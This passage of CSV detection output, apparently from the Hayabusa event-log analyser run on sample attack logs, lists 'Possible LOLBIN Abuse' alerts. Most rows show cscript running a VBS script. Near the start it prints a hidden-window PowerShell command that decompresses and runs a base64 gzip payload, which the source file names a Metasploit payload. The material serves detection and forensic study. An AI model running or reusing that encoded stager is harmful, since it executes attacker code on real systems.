MVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x13b8 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-21 23:56:46.597 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x13b8 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:57:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x112c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-21 23:57:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x112c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:58:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x11e4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-21 23:58:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x11e4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:59:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-21 23:59:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:00:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13c4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:00:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13c4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:01:03.003 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x123c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:01:03.003 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x123c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:02:03.009 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x10c0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:02:03.009 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x10c0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:03:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:03:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:04:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x125c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:04:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x125c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:05:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13e0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:05:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13e0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:06:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1460 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:06:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1460 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:07:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x958 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:07:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x958 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:08:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:08:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:09:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x164 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:09:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x164 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:10:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xd54 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:10:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xd54 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:11:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1268 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:11:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1268 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:12:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1380 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:12:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1380 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:13:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf24 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:13:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf24 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:14:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xff8 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:14:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xff8 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:15:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo 